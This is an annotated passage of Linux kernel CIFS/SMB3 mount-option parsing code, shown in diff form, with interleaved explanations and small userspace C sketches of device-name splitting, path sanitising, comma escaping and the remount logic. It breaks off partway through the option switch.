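#define IS_DELIM(c) ((c) == '/' || (c) == '\\')

static char *sanitize_prepath(char *prepath)
{
	char *cursor1 = prepath, *cursor2 = prepath;

	/* skip all prepended delimiters */
	while (IS_DELIM(*cursor1))
		cursor1++;

	/* copy the first letter */
	*cursor2 = *cursor1;

	/* copy the remainder, skipping duplicated delimiters */
	while (*(cursor1++)) {
		if (IS_DELIM(*cursor1) && IS_DELIM(*cursor2))
			continue;
		*(++cursor2) = *cursor1;
	}

	/* if the last character is a delimiter, drop it */
	if (cursor2 > prepath && IS_DELIM(*(cursor2 - 1)))
		cursor2--;

	*cursor2 = '\0';
	return strdup(prepath);
}

int main(void)
{
	char in[] = "//dir1///dir2\\\\dir3//";
	char *out = sanitize_prepath(in);

	printf("'%s'\n", out);	/* prints 'dir1/dir2\dir3' */
	free(out);
	return 0;
}
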
+-
+-/*
+- * Parse a devname into substrings and populate the ctx->UNC and ctx->prepath
+- * fields with the result. Returns 0 on success and an error otherwise
+- * (e.g. ENOMEM or EINVAL)
+- */
+-int
+-smb3_parse_devname(const char *devname, struct smb3_fs_context *ctx)
+-{
+-	char *pos;
+-	const char *delims = "/\\";
+-	size_t len;
+-
+-	if (unlikely(!devname || !*devname)) {
+-		cifs_dbg(VFS, "Device name not specified\n");
+-		return -EINVAL;
+-	}
+-
+-	/* make sure we have a valid UNC double delimiter prefix */
+-	len = strspn(devname, delims);
+-	if (len != 2)
+-		return -EINVAL;
+-
+-	/* find delimiter between host and sharename */
+-	pos = strpbrk(devname + 2, delims);
+-	if (!pos)
+-		return -EINVAL;
+-
+-	/* record the server hostname */
+-	kfree(ctx->server_hostname);
+-	ctx->server_hostname = kstrndup(devname + 2, pos - devname - 2, GFP_KERNEL);
+-	if (!ctx->server_hostname)
+-		return -ENOMEM;
+-
+-	/* skip past delimiter */
+-	++pos;
+-
+-	/* now go until next delimiter or end of string */
+-	len = strcspn(pos, delims);
+-
+-	/* move "pos" up to delimiter or NULL */
+-	pos += len;
+-	kfree(ctx->UNC);
+-	ctx->UNC = kstrndup(devname, pos - devname, GFP_KERNEL);
+-	if (!ctx->UNC)
+-		return -ENOMEM;
+-
+-	convert_delimiter(ctx->UNC, '\\');
+-
+-	/* skip any delimiter */
+-	if (*pos == '/' || *pos == '\\')
+-		pos++;
+-
+-	kfree(ctx->prepath);
+-	ctx->prepath = NULL;
+-
+-	/* If *pos is NUL then there is no prepath */
+-	if (!*pos)
+-		return 0;
+-
+-	ctx->prepath = cifs_sanitize_prepath(pos, GFP_KERNEL);
+-	if (!ctx->prepath)
+-		return -ENOMEM;
+-
+-	return 0;
+-}
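
For example, a devname of "//host/share/sub/dir" yields
server_hostname "host", UNC "\\host\share" (after convert_delimiter()
normalizes to backslashes), and prepath "sub/dir" (after
sanitization). A standalone sketch of the same strspn/strpbrk/strcspn
sequence (the devname below is a made-up example):

#include <stdio.h>
#include <string.h>

int main(void)
{
	const char *devname = "//host/share/sub//dir/";
	const char *delims = "/\\";
	const char *pos;
	size_t len;

	/* the UNC prefix must be exactly two delimiters */
	if (strspn(devname, delims) != 2)
		return 1;

	/* the host ends at the next delimiter */
	pos = strpbrk(devname + 2, delims);
	if (!pos)
		return 1;
	printf("host: %.*s\n", (int)(pos - devname - 2), devname + 2);

	/* the share name runs to the next delimiter or end of string */
	len = strcspn(++pos, delims);
	pos += len;
	printf("UNC:  %.*s\n", (int)(pos - devname), devname);

	/* whatever remains (minus one leading delimiter) is the prepath,
	 * still unsanitized at this point
	 */
	if (*pos == '/' || *pos == '\\')
		pos++;
	printf("path: %s\n", *pos ? pos : "(none)");
	return 0;
}
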
+-
+-static void smb3_fs_context_free(struct fs_context *fc);
+-static int smb3_fs_context_parse_param(struct fs_context *fc,
+-				       struct fs_parameter *param);
+-static int smb3_fs_context_parse_monolithic(struct fs_context *fc,
+-					    void *data);
+-static int smb3_get_tree(struct fs_context *fc);
+-static int smb3_reconfigure(struct fs_context *fc);
+-
+-static const struct fs_context_operations smb3_fs_context_ops = {
+-	.free			= smb3_fs_context_free,
+-	.parse_param		= smb3_fs_context_parse_param,
+-	.parse_monolithic	= smb3_fs_context_parse_monolithic,
+-	.get_tree		= smb3_get_tree,
+-	.reconfigure		= smb3_reconfigure,
+-};
+-
+-/*
+- * smb3_fs_context_parse_monolithic - Parse key[=val][,key[=val]]* mount data
+- * @fc: The filesystem context to fill in.
+- * @data: The data to parse
+- *
+- * Parse a monolithic block of data from sys_mount() that is in
+- * key[=val][,key[=val]]* form. This can be called from the
+- * ->parse_monolithic() fs_context operation.
+- *
+- * Returns 0 on success or the error returned by the ->parse_param() fs_context
+- * operation on failure.
+- */
+-static int smb3_fs_context_parse_monolithic(struct fs_context *fc,
+-					   void *data)
+-{
+-	struct smb3_fs_context *ctx = smb3_fc2context(fc);
+-	char *options = data, *key;
+-	int ret = 0;
+-
+-	if (!options)
+-		return 0;
+-
+-	ctx->mount_options = kstrdup(data, GFP_KERNEL);
+-	if (ctx->mount_options == NULL)
+-		return -ENOMEM;
+-
+-	ret = security_sb_eat_lsm_opts(options, &fc->security);
+-	if (ret)
+-		return ret;
+-
+-	/* BB Need to add support for sep= here TBD */
+-	while ((key = strsep(&options, ",")) != NULL) {
+-		size_t len;
+-		char *value;
+-
+-		if (*key == 0)
+-			break;
+-
+-		/* Check if the following character is the delimiter. If yes,
+-		 * we have encountered a double delimiter and reset the NUL
+-		 * character back to the delimiter.
+-		 */
+-		while (options && options[0] == ',') {
+-			len = strlen(key);
+-			strcpy(key + len, options);
+-			options = strchr(options, ',');
+-			if (options)
+-				*options++ = 0;
+-		}
+-
+-		len = 0;
+-		value = strchr(key, '=');
+-		if (value) {
+-			if (value == key)
+-				continue;
+-			*value++ = 0;
+-			len = strlen(value);
+-		}
+-
+-		ret = vfs_parse_fs_string(fc, key, value, len);
+-		if (ret < 0)
+-			break;
+-	}
+-
+-	return ret;
+-}
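
The inner while loop implements a small escaping rule: since ',' is
the option separator, a doubled ",," inside a value (commonly a
password) is stitched back into a single literal comma before the
key/value split. A userspace sketch of the same loop (memmove is used
here because the regions overlap; the option string is a made-up
example):

#include <stdio.h>
#include <string.h>

int main(void)
{
	char data[] = "user=alice,pass=se,,cret,vers=3.1.1";
	char *options = data, *key;

	while ((key = strsep(&options, ",")) != NULL) {
		char *value;

		if (!*key)
			break;

		/* ",," in the original becomes a literal ',' in the value */
		while (options && options[0] == ',') {
			size_t len = strlen(key);

			memmove(key + len, options, strlen(options) + 1);
			options = strchr(options, ',');
			if (options)
				*options++ = 0;
		}

		value = strchr(key, '=');
		if (value)
			*value++ = 0;
		printf("%s = %s\n", key, value ? value : "");
	}
	/* prints:
	 *   user = alice
	 *   pass = se,cret
	 *   vers = 3.1.1
	 */
	return 0;
}
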
+-
+-/*
+- * Validate the preparsed information in the config.
+- */
+-static int smb3_fs_context_validate(struct fs_context *fc)
+-{
+-	struct smb3_fs_context *ctx = smb3_fc2context(fc);
+-
+-	if (ctx->rdma && ctx->vals->protocol_id < SMB30_PROT_ID) {
+-		cifs_errorf(fc, "SMB Direct requires Version >=3.0\n");
+-		return -EOPNOTSUPP;
+-	}
+-
+-#ifndef CONFIG_KEYS
+-	/* Multiuser mounts require CONFIG_KEYS support */
+-	if (ctx->multiuser) {
+-		cifs_errorf(fc, "Multiuser mounts require kernels with CONFIG_KEYS enabled\n");
+-		return -1;
+-	}
+-#endif
+-
+-	if (ctx->got_version == false)
+-		pr_warn_once("No dialect specified on mount. Default has changed to a more secure dialect, SMB2.1 or later (e.g. SMB3.1.1), from CIFS (SMB1). To use the less secure SMB1 dialect to access old servers which do not support SMB3.1.1 (or even SMB3 or SMB2.1) specify vers=1.0 on mount.\n");
+-
+-	if (!ctx->UNC) {
+-		cifs_errorf(fc, "CIFS mount error: No usable UNC path provided in device string!\n");
+-		return -1;
+-	}
+-
+-	/* make sure UNC has a share name */
+-	if (strlen(ctx->UNC) < 3 || !strchr(ctx->UNC + 3, '\\')) {
+-		cifs_errorf(fc, "Malformed UNC. Unable to find share name.\n");
+-		return -ENOENT;
+-	}
+-
+-	if (!ctx->got_ip) {
+-		int len;
+-		const char *slash;
+-
+-		/* No ip= option specified? Try to get it from UNC */
+-		/* Use the address part of the UNC. */
+-		slash = strchr(&ctx->UNC[2], '\\');
+-		len = slash - &ctx->UNC[2];
+-		if (!cifs_convert_address((struct sockaddr *)&ctx->dstaddr,
+-					  &ctx->UNC[2], len)) {
+-			pr_err("Unable to determine destination address\n");
+-			return -EHOSTUNREACH;
+-		}
+-	}
+-
+-	/* set the port that we got earlier */
+-	cifs_set_port((struct sockaddr *)&ctx->dstaddr, ctx->port);
+-
+-	if (ctx->override_uid && !ctx->uid_specified) {
+-		ctx->override_uid = 0;
+-		pr_notice("ignoring forceuid mount option specified with no uid= option\n");
+-	}
+-
+-	if (ctx->override_gid && !ctx->gid_specified) {
+-		ctx->override_gid = 0;
+-		pr_notice("ignoring forcegid mount option specified with no gid= option\n");
+-	}
+-
+-	return 0;
+-}
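
The share-name check accepts a UNC only if something follows the host
component: after the two leading delimiters and at least one host
character there must be another backslash introducing the share. A
small illustration (the helper name is hypothetical):

#include <stdio.h>
#include <string.h>

static int unc_has_share(const char *unc)
{
	return strlen(unc) >= 3 && strchr(unc + 3, '\\') != NULL;
}

int main(void)
{
	printf("%d\n", unc_has_share("\\\\srv\\share"));	/* 1 */
	printf("%d\n", unc_has_share("\\\\srv"));		/* 0 */
	return 0;
}
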
+-
+-static int smb3_get_tree_common(struct fs_context *fc)
+-{
+-	struct smb3_fs_context *ctx = smb3_fc2context(fc);
+-	struct dentry *root;
+-	int rc = 0;
+-
+-	root = cifs_smb3_do_mount(fc->fs_type, 0, ctx);
+-	if (IS_ERR(root))
+-		return PTR_ERR(root);
+-
+-	fc->root = root;
+-
+-	return rc;
+-}
+-
+-/*
+- * Create an SMB3 superblock from the parameters passed.
+- */
+-static int smb3_get_tree(struct fs_context *fc)
+-{
+-	int err = smb3_fs_context_validate(fc);
+-	int ret;
+-
+-	if (err)
+-		return err;
+-	mutex_lock(&cifs_mount_mutex);
+-	ret = smb3_get_tree_common(fc);
+-	mutex_unlock(&cifs_mount_mutex);
+-	return ret;
+-}
+-
+-static void smb3_fs_context_free(struct fs_context *fc)
+-{
+-	struct smb3_fs_context *ctx = smb3_fc2context(fc);
+-
+-	smb3_cleanup_fs_context(ctx);
+-}
+-
+-/*
+- * Compare the old and new proposed context during reconfigure
+- * and check if the changes are compatible.
+- */
+-static int smb3_verify_reconfigure_ctx(struct fs_context *fc,
+-				       struct smb3_fs_context *new_ctx,
+-				       struct smb3_fs_context *old_ctx)
+-{
+-	if (new_ctx->posix_paths != old_ctx->posix_paths) {
+-		cifs_errorf(fc, "can not change posixpaths during remount\n");
+-		return -EINVAL;
+-	}
+-	if (new_ctx->sectype != old_ctx->sectype) {
+-		cifs_errorf(fc, "can not change sec during remount\n");
+-		return -EINVAL;
+-	}
+-	if (new_ctx->multiuser != old_ctx->multiuser) {
+-		cifs_errorf(fc, "can not change multiuser during remount\n");
+-		return -EINVAL;
+-	}
+-	if (new_ctx->UNC &&
+-	    (!old_ctx->UNC || strcmp(new_ctx->UNC, old_ctx->UNC))) {
+-		cifs_errorf(fc, "can not change UNC during remount\n");
+-		return -EINVAL;
+-	}
+-	if (new_ctx->username &&
+-	    (!old_ctx->username || strcmp(new_ctx->username, old_ctx->username))) {
+-		cifs_errorf(fc, "can not change username during remount\n");
+-		return -EINVAL;
+-	}
+-	if (new_ctx->password &&
+-	    (!old_ctx->password || strcmp(new_ctx->password, old_ctx->password))) {
+-		cifs_errorf(fc, "can not change password during remount\n");
+-		return -EINVAL;
+-	}
+-	if (new_ctx->domainname &&
+-	    (!old_ctx->domainname || strcmp(new_ctx->domainname, old_ctx->domainname))) {
+-		cifs_errorf(fc, "can not change domainname during remount\n");
+-		return -EINVAL;
+-	}
+-	if (strcmp(new_ctx->workstation_name, old_ctx->workstation_name)) {
+-		cifs_errorf(fc, "can not change workstation_name during remount\n");
+-		return -EINVAL;
+-	}
+-	if (new_ctx->nodename &&
+-	    (!old_ctx->nodename || strcmp(new_ctx->nodename, old_ctx->nodename))) {
+-		cifs_errorf(fc, "can not change nodename during remount\n");
+-		return -EINVAL;
+-	}
+-	if (new_ctx->iocharset &&
+-	    (!old_ctx->iocharset || strcmp(new_ctx->iocharset, old_ctx->iocharset))) {
+-		cifs_errorf(fc, "can not change iocharset during remount\n");
+-		return -EINVAL;
+-	}
+-
+-	return 0;
+-}
+-
+-#define STEAL_STRING(cifs_sb, ctx, field)				\
+-do {									\
+-	kfree(ctx->field);						\
+-	ctx->field = cifs_sb->ctx->field;				\
+-	cifs_sb->ctx->field = NULL;					\
+-} while (0)
+-
+-#define STEAL_STRING_SENSITIVE(cifs_sb, ctx, field)			\
+-do {									\
+-	kfree_sensitive(ctx->field);					\
+-	ctx->field = cifs_sb->ctx->field;				\
+-	cifs_sb->ctx->field = NULL;					\
+-} while (0)
+-
+-static int smb3_reconfigure(struct fs_context *fc)
+-{
+-	struct smb3_fs_context *ctx = smb3_fc2context(fc);
+-	struct dentry *root = fc->root;
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(root->d_sb);
+-	int rc;
+-
+-	rc = smb3_verify_reconfigure_ctx(fc, ctx, cifs_sb->ctx);
+-	if (rc)
+-		return rc;
+-
+-	/*
+-	 * We can not change UNC/username/password/domainname/
+-	 * workstation_name/nodename/iocharset
+-	 * during reconnect so ignore what we have in the new context and
+-	 * just use what we already have in cifs_sb->ctx.
+-	 */
+-	STEAL_STRING(cifs_sb, ctx, UNC);
+-	STEAL_STRING(cifs_sb, ctx, source);
+-	STEAL_STRING(cifs_sb, ctx, username);
+-	STEAL_STRING_SENSITIVE(cifs_sb, ctx, password);
+-	STEAL_STRING(cifs_sb, ctx, domainname);
+-	STEAL_STRING(cifs_sb, ctx, nodename);
+-	STEAL_STRING(cifs_sb, ctx, iocharset);
+-
+-	/* if rsize or wsize not passed in on remount, use previous values */
+-	if (ctx->rsize == 0)
+-		ctx->rsize = cifs_sb->ctx->rsize;
+-	if (ctx->wsize == 0)
+-		ctx->wsize = cifs_sb->ctx->wsize;
+-
+-	smb3_cleanup_fs_context_contents(cifs_sb->ctx);
+-	rc = smb3_fs_context_dup(cifs_sb->ctx, ctx);
+-	smb3_update_mnt_flags(cifs_sb);
+-#ifdef CONFIG_CIFS_DFS_UPCALL
+-	if (!rc)
+-		rc = dfs_cache_remount_fs(cifs_sb);
+-#endif
+-
+-	return rc;
+-}
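
STEAL_STRING() is a move, not a copy: the new context takes ownership
of the string already held by the superblock's context, which cannot
fail, so the remount never allocates for fields that may not change;
smb3_fs_context_dup() then copies the merged result back. The
_SENSITIVE variant differs only in using kfree_sensitive() so a
discarded password is wiped. A minimal analogue of the move (the
struct and field are illustrative):

#include <stdlib.h>

struct cfg { char *username; };

/* after this, only @dst owns the string; no allocation can fail */
static void steal_string(struct cfg *dst, struct cfg *src)
{
	free(dst->username);		/* drop whatever dst held */
	dst->username = src->username;	/* take ownership */
	src->username = NULL;		/* src forgets it */
}
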
+-
+-static int smb3_fs_context_parse_param(struct fs_context *fc,
+-				      struct fs_parameter *param)
+-{
+-	struct fs_parse_result result;
+-	struct smb3_fs_context *ctx = smb3_fc2context(fc);
+-	int i, opt;
+-	bool is_smb3 = !strcmp(fc->fs_type->name, "smb3");
+-	bool skip_parsing = false;
+-	kuid_t uid;
+-	kgid_t gid;
+-
+-	cifs_dbg(FYI, "CIFS: parsing cifs mount option '%s'\n", param->key);
+-
+-	/*
+-	 * fs_parse can not handle string options with an empty value so
+-	 * we will need special handling of them.
+-	 */
+-	if (param->type == fs_value_is_string && param->string[0] == 0) {
+-		if (!strcmp("pass", param->key) || !strcmp("password", param->key)) {
+-			skip_parsing = true;
+-			opt = Opt_pass;
+-		} else if (!strcmp("user", param->key) || !strcmp("username", param->key)) {
+-			skip_parsing = true;
+-			opt = Opt_user;
+-		}
+-	}
+-
+-	if (!skip_parsing) {
+-		opt = fs_parse(fc, smb3_fs_parameters, param, &result);
+-		if (opt < 0)
+-			return ctx->sloppy ? 1 : opt;
+-	}
+-
+-	switch (opt) {
+-	case Opt_compress:
+-		ctx->compression = UNKNOWN_TYPE;
+-		cifs_dbg(VFS,
+-			"SMB3 compression support is experimental\n");
+-		break;
+-	case Opt_nodfs:
+-		ctx->nodfs = 1;
+-		break;
+-	case Opt_hard:
+-		if (result.negated)
+-			ctx->retry = 0;
+-		else
+-			ctx->retry = 1;
+-		break;
+-	case Opt_soft:
+-		if (result.negated)
+-			ctx->retry = 1;
+-		else
+-			ctx->retry = 0;
+-		break;
+-	case Opt_mapposix:
+-		if (result.negated)
+-			ctx->remap = false;
+-		else {
+-			ctx->remap = true;
+-			ctx->sfu_remap = false; /* disable SFU mapping */
+-		}
+-		break;
+-	case Opt_mapchars:
+-		if (result.negated)
+-			ctx->sfu_remap = false;
+-		else {
+-			ctx->sfu_remap = true;
+-			ctx->remap = false; /* disable SFM (mapposix) mapping */
+-		}
+-		break;
+-	case Opt_user_xattr:
+-		if (result.negated)
+-			ctx->no_xattr = 1;
+-		else
+-			ctx->no_xattr = 0;
+-		break;
+-	case Opt_forceuid:
+-		if (result.negated)
+-			ctx->override_uid = 0;
+-		else
+-			ctx->override_uid = 1;
+-		break;
+-	case Opt_forcegid:
+-		if (result.negated)
+-			ctx->override_gid = 0;
+-		else
+-			ctx->override_gid = 1;
+-		break;
+-	case Opt_perm:
+-		if (result.negated)
+-			ctx->noperm = 1;
+-		else
+-			ctx->noperm = 0;
+-		break;
+-	case Opt_dynperm:
+-		if (result.negated)
+-			ctx->dynperm = 0;
+-		else
+-			ctx->dynperm = 1;
+-		break;
+-	case Opt_sfu:
+-		if (result.negated)
+-			ctx->sfu_emul = 0;
+-		else
+-			ctx->sfu_emul = 1;
+-		break;
+-	case Opt_noblocksend:
+-		ctx->noblocksnd = 1;
+-		break;
+-	case Opt_noautotune:
+-		ctx->noautotune = 1;
+-		break;
+-	case Opt_nolease:
+-		ctx->no_lease = 1;
+-		break;
+-	case Opt_nosparse:
+-		ctx->no_sparse = 1;
+-		break;
+-	case Opt_nodelete:
+-		ctx->nodelete = 1;
+-		break;
+-	case Opt_multichannel:
+-		if (result.negated) {
+-			ctx->multichannel = false;
+-			ctx->max_channels = 1;
+-		} else {
+-			ctx->multichannel = true;
+-			/* if number of channels not specified, default to 2 */
+-			if (ctx->max_channels < 2)
+-				ctx->max_channels = 2;
+-		}
+-		break;
+-	case Opt_uid:
+-		uid = make_kuid(current_user_ns(), result.uint_32);
+-		if (!uid_valid(uid))
+-			goto cifs_parse_mount_err;
+-		ctx->linux_uid = uid;
+-		ctx->uid_specified = true;
+-		break;
+-	case Opt_cruid:
+-		uid = make_kuid(current_user_ns(), result.uint_32);
+-		if (!uid_valid(uid))
+-			goto cifs_parse_mount_err;
+-		ctx->cred_uid = uid;
+-		ctx->cruid_specified = true;
+-		break;
+-	case Opt_backupuid:
+-		uid = make_kuid(current_user_ns(), result.uint_32);
+-		if (!uid_valid(uid))
+-			goto cifs_parse_mount_err;
+-		ctx->backupuid = uid;
+-		ctx->backupuid_specified = true;
+-		break;
+-	case Opt_backupgid:
+-		gid = make_kgid(current_user_ns(), result.uint_32);
+-		if (!gid_valid(gid))
+-			goto cifs_parse_mount_err;
+-		ctx->backupgid = gid;
+-		ctx->backupgid_specified = true;
+-		break;
+-	case Opt_gid:
+-		gid = make_kgid(current_user_ns(), result.uint_32);
+-		if (!gid_valid(gid))
+-			goto cifs_parse_mount_err;
+-		ctx->linux_gid = gid;
+-		ctx->gid_specified = true;
+-		break;
+-	case Opt_port:
+-		ctx->port = result.uint_32;
+-		break;
+-	case Opt_file_mode:
+-		ctx->file_mode = result.uint_32;
+-		break;
+-	case Opt_dirmode:
+-		ctx->dir_mode = result.uint_32;
+-		break;
+-	case Opt_min_enc_offload:
+-		ctx->min_offload = result.uint_32;
+-		break;
+-	case Opt_blocksize:
+-		/*
+-		 * inode blocksize realistically should never need to be
+-		 * less than 16K or greater than 16M and default is 1MB.
+-		 * Note that small inode block sizes (e.g. 64K) can lead
+-		 * to very poor performance of common tools like cp and scp
+-		 */
+-		if ((result.uint_32 < CIFS_MAX_MSGSIZE) ||
+-		   (result.uint_32 > (4 * SMB3_DEFAULT_IOSIZE))) {
+-			cifs_errorf(fc, "%s: Invalid blocksize\n",
+-				__func__);
+-			goto cifs_parse_mount_err;
+-		}
+-		ctx->bsize = result.uint_32;
+-		ctx->got_bsize = true;
+-		break;
+-	case Opt_rasize:
+-		/*
+-		 * readahead size realistically should never need to be
+-		 * less than 1M (CIFS_DEFAULT_IOSIZE) or greater than 32M
+-		 * (perhaps an exception should be considered for the case
+-		 * of a large number of channels when multichannel is
+-		 * negotiated) since that would lead to plenty of parallel
+-		 * I/O in flight to the server. Note that smaller readahead
+-		 * sizes would hurt performance of common tools like cp and
+-		 * scp which often trigger sequential I/O with readahead.
+-		 */
+-		if ((result.uint_32 > (8 * SMB3_DEFAULT_IOSIZE)) ||
+-		    (result.uint_32 < CIFS_DEFAULT_IOSIZE)) {
+-			cifs_errorf(fc, "%s: Invalid rasize %d vs. %d\n",
+-				__func__, result.uint_32, SMB3_DEFAULT_IOSIZE);
+-			goto cifs_parse_mount_err;
+-		}
+-		ctx->rasize = result.uint_32;
+-		break;
+-	case Opt_rsize:
+-		ctx->rsize = result.uint_32;
+-		ctx->got_rsize = true;
+-		break;
+-	case Opt_wsize:
+-		ctx->wsize = result.uint_32;
+-		ctx->got_wsize = true;
+-		break;
+-	case Opt_acregmax:
+-		ctx->acregmax = HZ * result.uint_32;
+-		if (ctx->acregmax > CIFS_MAX_ACTIMEO) {
+-			cifs_errorf(fc, "acregmax too large\n");
+-			goto cifs_parse_mount_err;
+-		}
+-		break;
+-	case Opt_acdirmax:
+-		ctx->acdirmax = HZ * result.uint_32;
+-		if (ctx->acdirmax > CIFS_MAX_ACTIMEO) {
+-			cifs_errorf(fc, "acdirmax too large\n");
+-			goto cifs_parse_mount_err;
+-		}
+-		break;
+-	case Opt_actimeo:
+-		if (HZ * result.uint_32 > CIFS_MAX_ACTIMEO) {
+-			cifs_errorf(fc, "timeout too large\n");
+-			goto cifs_parse_mount_err;
+-		}
+-		if ((ctx->acdirmax != CIFS_DEF_ACTIMEO) ||
+-		    (ctx->acregmax != CIFS_DEF_ACTIMEO)) {
+-			cifs_errorf(fc, "actimeo ignored since acregmax or acdirmax specified\n");
+-			break;
+-		}
+-		ctx->acdirmax = ctx->acregmax = HZ * result.uint_32;
+-		break;
+-	case Opt_closetimeo:
+-		ctx->closetimeo = HZ * result.uint_32;
+-		if (ctx->closetimeo > SMB3_MAX_DCLOSETIMEO) {
+-			cifs_errorf(fc, "closetimeo too large\n");
+-			goto cifs_parse_mount_err;
+-		}
+-		break;
+-	case Opt_echo_interval:
+-		ctx->echo_interval = result.uint_32;
+-		break;
+-	case Opt_snapshot:
+-		ctx->snapshot_time = result.uint_64;
+-		break;
+-	case Opt_max_credits:
+-		if (result.uint_32 < 20 || result.uint_32 > 60000) {
+-			cifs_errorf(fc, "%s: Invalid max_credits value\n",
+-				 __func__);
+-			goto cifs_parse_mount_err;
+-		}
+-		ctx->max_credits = result.uint_32;
+-		break;
+-	case Opt_max_channels:
+-		if (result.uint_32 < 1 || result.uint_32 > CIFS_MAX_CHANNELS) {
+-			cifs_errorf(fc, "%s: Invalid max_channels value, needs to be 1-%d\n",
+-				 __func__, CIFS_MAX_CHANNELS);
+-			goto cifs_parse_mount_err;
+-		}
+-		ctx->max_channels = result.uint_32;
+-		/* If more than one channel requested ... they want multichan */
+-		if (result.uint_32 > 1)
+-			ctx->multichannel = true;
+-		break;
+-	case Opt_handletimeout:
+-		ctx->handle_timeout = result.uint_32;
+-		if (ctx->handle_timeout > SMB3_MAX_HANDLE_TIMEOUT) {
+-			cifs_errorf(fc, "Invalid handle cache timeout, longer than 16 minutes\n");
+-			goto cifs_parse_mount_err;
+-		}
+-		break;
+-	case Opt_source:
+-		kfree(ctx->UNC);
+-		ctx->UNC = NULL;
+-		switch (smb3_parse_devname(param->string, ctx)) {
+-		case 0:
+-			break;
+-		case -ENOMEM:
+-			cifs_errorf(fc, "Unable to allocate memory for devname\n");
+-			goto cifs_parse_mount_err;
+-		case -EINVAL:
+-			cifs_errorf(fc, "Malformed UNC in devname\n");
+-			goto cifs_parse_mount_err;
+-		default:
+-			cifs_errorf(fc, "Unknown error parsing devname\n");
+-			goto cifs_parse_mount_err;
+-		}
+-		ctx->source = kstrdup(param->string, GFP_KERNEL);
+-		if (ctx->source == NULL) {
+-			cifs_errorf(fc, "OOM when copying UNC string\n");
+-			goto cifs_parse_mount_err;
+-		}
+-		fc->source = kstrdup(param->string, GFP_KERNEL);
+-		if (fc->source == NULL) {
+-			cifs_errorf(fc, "OOM when copying UNC string\n");
+-			goto cifs_parse_mount_err;
+-		}
+-		break;
+-	case Opt_user:
+-		kfree(ctx->username);
+-		ctx->username = NULL;
+-		if (strlen(param->string) == 0) {
+-			/* null user, i.e. anonymous authentication */
+-			ctx->nullauth = 1;
+-			break;
+-		}
+-
+-		if (strnlen(param->string, CIFS_MAX_USERNAME_LEN) >
+-		    CIFS_MAX_USERNAME_LEN) {
+-			pr_warn("username too long\n");
+-			goto cifs_parse_mount_err;
+-		}
+-		ctx->username = kstrdup(param->string, GFP_KERNEL);
+-		if (ctx->username == NULL) {
+-			cifs_errorf(fc, "OOM when copying username string\n");
+-			goto cifs_parse_mount_err;
+-		}
+-		break;
+-	case Opt_pass:
+-		kfree_sensitive(ctx->password);
+-		ctx->password = NULL;
+-		if (strlen(param->string) == 0)
+-			break;
+-
+-		ctx->password = kstrdup(param->string, GFP_KERNEL);
+-		if (ctx->password == NULL) {
+-			cifs_errorf(fc, "OOM when copying password string\n");
+-			goto cifs_parse_mount_err;
+-		}
+-		break;
+-	case Opt_ip:
+-		if (strlen(param->string) == 0) {
+-			ctx->got_ip = false;
+-			break;
+-		}
+-		if (!cifs_convert_address((struct sockaddr *)&ctx->dstaddr,
+-					  param->string,
+-					  strlen(param->string))) {
+-			pr_err("bad ip= option (%s)\n", param->string);
+-			goto cifs_parse_mount_err;
+-		}
+-		ctx->got_ip = true;
+-		break;
+-	case Opt_domain:
+-		if (strnlen(param->string, CIFS_MAX_DOMAINNAME_LEN)
+-				== CIFS_MAX_DOMAINNAME_LEN) {
+-			pr_warn("domain name too long\n");
+-			goto cifs_parse_mount_err;
+-		}
+-
+-		kfree(ctx->domainname);
+-		ctx->domainname = kstrdup(param->string, GFP_KERNEL);
+-		if (ctx->domainname == NULL) {
+-			cifs_errorf(fc, "OOM when copying domainname string\n");
+-			goto cifs_parse_mount_err;
+-		}
+-		cifs_dbg(FYI, "Domain name set\n");
+-		break;
+-	case Opt_srcaddr:
+-		if (!cifs_convert_address(
+-				(struct sockaddr *)&ctx->srcaddr,
+-				param->string, strlen(param->string))) {
+-			pr_warn("Could not parse srcaddr: %s\n",
+-				param->string);
+-			goto cifs_parse_mount_err;
+-		}
+-		break;
+-	case Opt_iocharset:
+-		if (strnlen(param->string, 1024) >= 65) {
+-			pr_warn("iocharset name too long\n");
+-			goto cifs_parse_mount_err;
+-		}
+-
+-		if (strncasecmp(param->string, "default", 7) != 0) {
+-			kfree(ctx->iocharset);
+-			ctx->iocharset = kstrdup(param->string, GFP_KERNEL);
+-			if (ctx->iocharset == NULL) {
+-				cifs_errorf(fc, "OOM when copying iocharset string\n");
+-				goto cifs_parse_mount_err;
+-			}
+-		}
+-		/* if iocharset not set then load_nls_default
+-		 * is used by caller
+-		 */
+-		cifs_dbg(FYI, "iocharset set to %s\n", ctx->iocharset);
+-		break;
+-	case Opt_netbiosname:
+-		memset(ctx->source_rfc1001_name, 0x20,
+-			RFC1001_NAME_LEN);
+-		/*
+-		 * FIXME: are there cases in which a comma can
+-		 * be valid in workstation netbios name (and
+-		 * need special handling)?
+-		 */
+-		for (i = 0; i < RFC1001_NAME_LEN; i++) {
+-			/* don't ucase netbiosname for user */
+-			if (param->string[i] == 0)
+-				break;
+-			ctx->source_rfc1001_name[i] = param->string[i];
+-		}
+-		/* The string still has its 16th byte zero, from the
+-		 * memset at the top of this case.
+-		 */
+-		if (i == RFC1001_NAME_LEN && param->string[i] != 0)
+-			pr_warn("netbiosname longer than 15 truncated\n");
+-		break;
+-	case Opt_servern:
+-		/* last byte, type, is 0x20 for server type */
+-		memset(ctx->target_rfc1001_name, 0x20,
+-			RFC1001_NAME_LEN_WITH_NULL);
+-		/*
+-		 * BB are there cases in which a comma can be valid in this
+-		 * workstation netbios name (and need special handling)?
+-		 */
+-
+-		/* user or mount helper must uppercase the netbios name */
+-		for (i = 0; i < 15; i++) {
+-			if (param->string[i] == 0)
+-				break;
+-			ctx->target_rfc1001_name[i] = param->string[i];
+-		}
+-
+-		/* The string still has its 16th byte zero, from the memset above */
+-		if (i == RFC1001_NAME_LEN && param->string[i] != 0)
+-			pr_warn("server netbiosname longer than 15 truncated\n");
+-		break;
+-	case Opt_ver:
+-		/* version of mount userspace tools, not dialect */
+-		/* If interface changes in mount.cifs bump to new ver */
+-		if (strncasecmp(param->string, "1", 1) == 0) {
+-			if (strlen(param->string) > 1) {
+-				pr_warn("Bad mount helper ver=%s. Did you want SMB1 (CIFS) dialect and mean to type vers=1.0 instead?\n",
+-					param->string);
+-				goto cifs_parse_mount_err;
+-			}
+-			/* This is the default */
+-			break;
+-		}
+-		/* For all other value, error */
+-		pr_warn("Invalid mount helper version specified\n");
+-		goto cifs_parse_mount_err;
+-	case Opt_vers:
+-		/* protocol version (dialect) */
+-		if (cifs_parse_smb_version(fc, param->string, ctx, is_smb3) != 0)
+-			goto cifs_parse_mount_err;
